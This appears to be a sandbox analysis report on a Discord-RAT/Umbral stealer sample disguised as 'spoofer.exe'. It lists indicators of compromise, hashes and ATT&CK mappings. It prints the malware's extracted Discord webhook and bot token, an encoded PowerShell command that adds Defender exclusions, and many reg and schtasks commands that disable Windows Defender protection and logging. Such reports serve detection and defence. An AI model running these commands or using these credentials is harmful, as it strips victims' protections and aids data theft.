discordrat | 5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d

Analysis

max time kernel
144s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2024 22:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

spoofer.exe
Size

442KB
MD5

d5a84036071756dee960de255bd6ab94
SHA1

83b439582a8f3392f18dde97b56d937c518b1cd2
SHA256

5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d
SHA512

fe0dec1e8422d9dd74431ccccff23e7083d356498ff98dc1c5680e1553c5145dbf1c854e48263c5d58a18c87c7bc7016294518ec1491045da7f62c1077a07779
SSDEEP

12288:3o0NHvykT8QNmJCDWs2qUa3zYgNl3Qc65snvJ:3phFT8QC6WsVUM7NxQcsaJ

Score

10^/10

discordrat umbral evasion persistence rat rootkit stealer trojan

Malware Config

Extracted

Family

umbral

https://ptb.discord.com/api/webhooks/1197286741825048616/mPoY62Pti_IE-hGcDYD9Kd5GhKzKQHzuySPby-xlg9GCRDWrviTGJ9au_QMU1pKDVh50

Extracted

Family

discordrat

Attributes

discord_token
MTE5MzczNzA3MzIzNzE4MDQyNg.GQDWc0.k4Yc3XgNEdmji15f8P6ui2A0sVB2zvpOmkNPlw
server_id
1196510448573489273

Signatures

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral2/memory/2092-36-0x00000246CEE60000-0x00000246CEEA0000-memory.dmp	family_umbral
behavioral2/files/0x0007000000023212-34.dat	family_umbral
behavioral2/files/0x0007000000023212-33.dat	family_umbral
behavioral2/files/0x0007000000023212-27.dat	family_umbral

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	spoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	cleaner.exe

Executes dropped EXE 3 IoCs

pid	Process
5080	cleaner.exe
4680	Spoofer.exe
2092	Woofer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\cleaner.exe	spoofer.exe
File created	C:\Windows\Spoofer.exe	spoofer.exe
File created	C:\Windows\Woofer.exe	spoofer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
5536	powershell.exe
5536	powershell.exe
5536	powershell.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	4680	Spoofer.exe
Token: SeDebugPrivilege	2092	Woofer.exe
Token: SeDebugPrivilege	5536	powershell.exe
Token: SeIncreaseQuotaPrivilege	3264	wmic.exe
Token: SeSecurityPrivilege	3264	wmic.exe
Token: SeTakeOwnershipPrivilege	3264	wmic.exe
Token: SeLoadDriverPrivilege	3264	wmic.exe
Token: SeSystemProfilePrivilege	3264	wmic.exe
Token: SeSystemtimePrivilege	3264	wmic.exe
Token: SeProfSingleProcessPrivilege	3264	wmic.exe
Token: SeIncBasePriorityPrivilege	3264	wmic.exe
Token: SeCreatePagefilePrivilege	3264	wmic.exe
Token: SeBackupPrivilege	3264	wmic.exe
Token: SeRestorePrivilege	3264	wmic.exe
Token: SeShutdownPrivilege	3264	wmic.exe
Token: SeDebugPrivilege	3264	wmic.exe
Token: SeSystemEnvironmentPrivilege	3264	wmic.exe
Token: SeRemoteShutdownPrivilege	3264	wmic.exe
Token: SeUndockPrivilege	3264	wmic.exe
Token: SeManageVolumePrivilege	3264	wmic.exe
Token: 33	3264	wmic.exe
Token: 34	3264	wmic.exe
Token: 35	3264	wmic.exe
Token: 36	3264	wmic.exe
Token: SeIncreaseQuotaPrivilege	3264	wmic.exe
Token: SeSecurityPrivilege	3264	wmic.exe
Token: SeTakeOwnershipPrivilege	3264	wmic.exe
Token: SeLoadDriverPrivilege	3264	wmic.exe
Token: SeSystemProfilePrivilege	3264	wmic.exe
Token: SeSystemtimePrivilege	3264	wmic.exe
Token: SeProfSingleProcessPrivilege	3264	wmic.exe
Token: SeIncBasePriorityPrivilege	3264	wmic.exe
Token: SeCreatePagefilePrivilege	3264	wmic.exe
Token: SeBackupPrivilege	3264	wmic.exe
Token: SeRestorePrivilege	3264	wmic.exe
Token: SeShutdownPrivilege	3264	wmic.exe
Token: SeDebugPrivilege	3264	wmic.exe
Token: SeSystemEnvironmentPrivilege	3264	wmic.exe
Token: SeRemoteShutdownPrivilege	3264	wmic.exe
Token: SeUndockPrivilege	3264	wmic.exe
Token: SeManageVolumePrivilege	3264	wmic.exe
Token: 33	3264	wmic.exe
Token: 34	3264	wmic.exe
Token: 35	3264	wmic.exe
Token: 36	3264	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1940 wrote to memory of 5536	1940	spoofer.exe	90
PID 1940 wrote to memory of 5536	1940	spoofer.exe	90
PID 1940 wrote to memory of 5536	1940	spoofer.exe	90
PID 1940 wrote to memory of 5080	1940	spoofer.exe	96
PID 1940 wrote to memory of 5080	1940	spoofer.exe	96
PID 1940 wrote to memory of 4680	1940	spoofer.exe	92
PID 1940 wrote to memory of 4680	1940	spoofer.exe	92
PID 1940 wrote to memory of 2092	1940	spoofer.exe	93
PID 1940 wrote to memory of 2092	1940	spoofer.exe	93
PID 5080 wrote to memory of 5260	5080	cleaner.exe	94
PID 5080 wrote to memory of 5260	5080	cleaner.exe	94
PID 5260 wrote to memory of 3440	5260	cmd.exe	111
PID 5260 wrote to memory of 3440	5260	cmd.exe	111
PID 5260 wrote to memory of 4336	5260	cmd.exe	110
PID 5260 wrote to memory of 4336	5260	cmd.exe	110
PID 5260 wrote to memory of 4876	5260	cmd.exe	99
PID 5260 wrote to memory of 4876	5260	cmd.exe	99
PID 5260 wrote to memory of 2992	5260	cmd.exe	97
PID 5260 wrote to memory of 2992	5260	cmd.exe	97
PID 5260 wrote to memory of 2680	5260	cmd.exe	98
PID 5260 wrote to memory of 2680	5260	cmd.exe	98
PID 5260 wrote to memory of 2376	5260	cmd.exe	109
PID 5260 wrote to memory of 2376	5260	cmd.exe	109
PID 5260 wrote to memory of 3576	5260	cmd.exe	107
PID 5260 wrote to memory of 3576	5260	cmd.exe	107
PID 5260 wrote to memory of 5164	5260	cmd.exe	100
PID 5260 wrote to memory of 5164	5260	cmd.exe	100
PID 5260 wrote to memory of 3580	5260	cmd.exe	103
PID 5260 wrote to memory of 3580	5260	cmd.exe	103
PID 5260 wrote to memory of 4320	5260	cmd.exe	101
PID 5260 wrote to memory of 4320	5260	cmd.exe	101
PID 5260 wrote to memory of 3020	5260	cmd.exe	102
PID 5260 wrote to memory of 3020	5260	cmd.exe	102
PID 5260 wrote to memory of 3644	5260	cmd.exe	104
PID 5260 wrote to memory of 3644	5260	cmd.exe	104
PID 2092 wrote to memory of 3264	2092	Woofer.exe	106
PID 2092 wrote to memory of 3264	2092	Woofer.exe	106
PID 5260 wrote to memory of 6044	5260	cmd.exe	108
PID 5260 wrote to memory of 6044	5260	cmd.exe	108
PID 5260 wrote to memory of 1404	5260	cmd.exe	112
PID 5260 wrote to memory of 1404	5260	cmd.exe	112
PID 5260 wrote to memory of 2800	5260	cmd.exe	133
PID 5260 wrote to memory of 2800	5260	cmd.exe	133
PID 5260 wrote to memory of 5404	5260	cmd.exe	132
PID 5260 wrote to memory of 5404	5260	cmd.exe	132
PID 5260 wrote to memory of 1472	5260	cmd.exe	115
PID 5260 wrote to memory of 1472	5260	cmd.exe	115
PID 5260 wrote to memory of 2792	5260	cmd.exe	114
PID 5260 wrote to memory of 2792	5260	cmd.exe	114
PID 5260 wrote to memory of 1176	5260	cmd.exe	131
PID 5260 wrote to memory of 1176	5260	cmd.exe	131
PID 5260 wrote to memory of 4704	5260	cmd.exe	130
PID 5260 wrote to memory of 4704	5260	cmd.exe	130
PID 5260 wrote to memory of 3456	5260	cmd.exe	116
PID 5260 wrote to memory of 3456	5260	cmd.exe	116
PID 5260 wrote to memory of 2232	5260	cmd.exe	129
PID 5260 wrote to memory of 2232	5260	cmd.exe	129
PID 5260 wrote to memory of 400	5260	cmd.exe	128
PID 5260 wrote to memory of 400	5260	cmd.exe	128
PID 5260 wrote to memory of 5352	5260	cmd.exe	127
PID 5260 wrote to memory of 5352	5260	cmd.exe	127
PID 5260 wrote to memory of 4344	5260	cmd.exe	125
PID 5260 wrote to memory of 4344	5260	cmd.exe	125
PID 5260 wrote to memory of 3312	5260	cmd.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\spoofer.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAawBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdQB1ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5536
- C:\Windows\Spoofer.exe
  "C:\Windows\Spoofer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4680
- C:\Windows\Woofer.exe
  "C:\Windows\Woofer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3264
- C:\Windows\cleaner.exe
  "C:\Windows\cleaner.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5080

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4D26.tmp\4D27.tmp\4D28.bat C:\Windows\cleaner.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5260
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
  2⤵
  PID:2992
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:2680
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:4876
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:5164
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4320
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:3020
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3580
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:3644
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3576
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:6044
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2376
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4336
- C:\Windows\system32\reg.exe
  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:3440
- C:\Windows\system32\reg.exe
  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
  2⤵
  PID:1404
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:2792
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1472
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:3456
- C:\Windows\system32\reg.exe
  reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:3312
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:5544
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:2788
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3484
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3252
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:5356
- C:\Windows\system32\reg.exe
  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:4344
- C:\Windows\system32\reg.exe
  reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:5352
- C:\Windows\system32\reg.exe
  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
  2⤵
  PID:400
- C:\Windows\system32\reg.exe
  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
  2⤵
  PID:2232
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:4704
- C:\Windows\system32\schtasks.exe
  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:1176
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:5404
- C:\Windows\system32\reg.exe
  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4D26.tmp\4D27.tmp\4D28.bat

Filesize
3KB

MD5
37a937d63e6dcc8f8de4b8847d210546

SHA1
98ca34f1a7cf66d583822b83cd1c65a1fb7f1d4a

SHA256
111ac48198ba45919584668ed9ad15010d316de7f1665f4d42ec249259f696bc

SHA512
062046aca604cf5f329590b1a9ee317974b45f0bdc18f70b74489ece55737480cbb5544d1ced8f5d0e8c66af4b38085ac4e70f26dac2b6d6a50d26f9b36e2b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1vrm32y.jcz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Spoofer.exe

Filesize
78KB

MD5
698d53d0e0b33c8eeec2dc5ee507e971

SHA1
a4c4999c0aeeb2552ec063960a37a4296bf6eb02

SHA256
3dbf21a8a065a297e0d16148f3931315e4e25e1872eed4fd9a256191571a223d

SHA512
5c6ec88ee5b93476f522d87f8edd4b8a1ce78ea47b8ee7d320941a092b5943877ff3a639a00589d6d2e937a41019ad12408576c4223d7a9ac87826d3385abef5

Download Submit
C:\Windows\Woofer.exe

Filesize
231KB

MD5
c0922cfbf0bc3b88f4ab89146f1c5225

SHA1
c9120012509c3942e0299c1c7eb9fe190b978917

SHA256
59f283a7f4a7d50e13c963bb2ae0b3ebd0433bb73f2d582b2c9dd0e7564bce0d

SHA512
d7aaed129723526b66eb8e7917e893426d035bb2583200680cc2683038203dfdd7d48d0deaece13ea4de7eefcd948a891e6f107d19dc0e5f64a0dd760f100b9f

Download Submit
C:\Windows\Woofer.exe

Filesize
116KB

MD5
096be4e0f15bbb453a7eac93406d556c

SHA1
0ebc721862bcad27c06c4d26a70f981f794baf50

SHA256
5300276f536187d12a0e409b653274a67668103e913f51272714d35048950f67

SHA512
ed0f7327f5b330bc0b8bb53a6f9c2d3965bdf6fd4e778c02c814940459b264fc6f4de0fbc4e604b8270dd071461cdfc278731a4af9e86b3e6d1baf39cca4d715

Download Submit
C:\Windows\Woofer.exe

Filesize
78KB

MD5
9352aea1b0d7e9934a53b9fcde6c3bc4

SHA1
f6e03b7ad2fcc06d64f7fe05a72162fa0cb10fb6

SHA256
a7568389b1f0710624afd989350c1ad310dcad70511c611915171cbf7098b1e2

SHA512
b9482612037be69b10374df4418604297cd4675abd3261d22cee008497d49071630e900e1e5d655346f9b73492f93840faaa06c58df1407be84ad87056085c34

Download Submit
C:\Windows\cleaner.exe

Filesize
127KB

MD5
86cb66d7f7740d8ae241ff6dae24a963

SHA1
19aff29c5319ba0bcbab649d16412b5e27f3e07c

SHA256
cea237087535cd1e6ed4c1fd199e9b297a2720eeac41eadd1976d2efda7bf9cf

SHA512
b8d1839e669795b0506448a2de98992ceccc5e24b4e6fb8c81397d3991cbfe56f0e285878ffcfe10a186bf2833343566208ae8d8af7b8f39ddbd2f316a410322

Download Submit
memory/2092-40-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

Filesize
10.8MB

Download
memory/2092-36-0x00000246CEE60000-0x00000246CEEA0000-memory.dmp

Filesize
256KB

Download
memory/2092-63-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

Filesize
10.8MB

Download
memory/2092-39-0x00000246D0B10000-0x00000246D0B20000-memory.dmp

Filesize
64KB

Download
memory/4680-59-0x00000159DBB10000-0x00000159DC038000-memory.dmp

Filesize
5.2MB

Download
memory/4680-38-0x00000159DA910000-0x00000159DA920000-memory.dmp

Filesize
64KB

Download
memory/4680-93-0x00000159DA910000-0x00000159DA920000-memory.dmp

Filesize
64KB

Download
memory/4680-92-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

Filesize
10.8MB

Download
memory/4680-91-0x00000159DB5E0000-0x00000159DB688000-memory.dmp

Filesize
672KB

Download
memory/4680-31-0x00000159C04A0000-0x00000159C04B8000-memory.dmp

Filesize
96KB

Download
memory/4680-35-0x00000159DAA20000-0x00000159DABE2000-memory.dmp

Filesize
1.8MB

Download
memory/4680-37-0x00007FFE7D750000-0x00007FFE7E211000-memory.dmp

Filesize
10.8MB

Download
memory/5536-66-0x00000000707E0000-0x000000007082C000-memory.dmp

Filesize
304KB

Download
memory/5536-79-0x0000000007B40000-0x00000000081BA000-memory.dmp

Filesize
6.5MB

Download
memory/5536-53-0x0000000005B40000-0x0000000005BA6000-memory.dmp

Filesize
408KB

Download
memory/5536-47-0x0000000005AD0000-0x0000000005B36000-memory.dmp

Filesize
408KB

Download
memory/5536-60-0x0000000006160000-0x000000000617E000-memory.dmp

Filesize
120KB

Download
memory/5536-61-0x0000000006740000-0x000000000678C000-memory.dmp

Filesize
304KB

Download
memory/5536-77-0x0000000004CF0000-0x0000000004D00000-memory.dmp

Filesize
64KB

Download
memory/5536-78-0x0000000007410000-0x00000000074B3000-memory.dmp

Filesize
652KB

Download
memory/5536-76-0x0000000006690000-0x00000000066AE000-memory.dmp

Filesize
120KB

Download
memory/5536-41-0x00000000749C0000-0x0000000075170000-memory.dmp

Filesize
7.7MB

Download
memory/5536-65-0x00000000066D0000-0x0000000006702000-memory.dmp

Filesize
200KB

Download
memory/5536-64-0x000000007F6F0000-0x000000007F700000-memory.dmp

Filesize
64KB

Download
memory/5536-80-0x0000000006840000-0x000000000685A000-memory.dmp

Filesize
104KB

Download
memory/5536-58-0x0000000005CB0000-0x0000000006004000-memory.dmp

Filesize
3.3MB

Download
memory/5536-81-0x0000000007510000-0x000000000751A000-memory.dmp

Filesize
40KB

Download
memory/5536-46-0x00000000051B0000-0x00000000051D2000-memory.dmp

Filesize
136KB

Download
memory/5536-82-0x0000000007730000-0x00000000077C6000-memory.dmp

Filesize
600KB

Download
memory/5536-83-0x00000000076A0000-0x00000000076B1000-memory.dmp

Filesize
68KB

Download
memory/5536-84-0x00000000076E0000-0x00000000076EE000-memory.dmp

Filesize
56KB

Download
memory/5536-85-0x00000000076F0000-0x0000000007704000-memory.dmp

Filesize
80KB

Download
memory/5536-87-0x0000000007720000-0x0000000007728000-memory.dmp

Filesize
32KB

Download
memory/5536-86-0x00000000077D0000-0x00000000077EA000-memory.dmp

Filesize
104KB

Download
memory/5536-90-0x00000000749C0000-0x0000000075170000-memory.dmp

Filesize
7.7MB

Download
memory/5536-45-0x0000000005330000-0x0000000005958000-memory.dmp

Filesize
6.2MB

Download
memory/5536-43-0x0000000004CF0000-0x0000000004D00000-memory.dmp

Filesize
64KB

Download
memory/5536-42-0x0000000004BB0000-0x0000000004BE6000-memory.dmp

Filesize
216KB

Download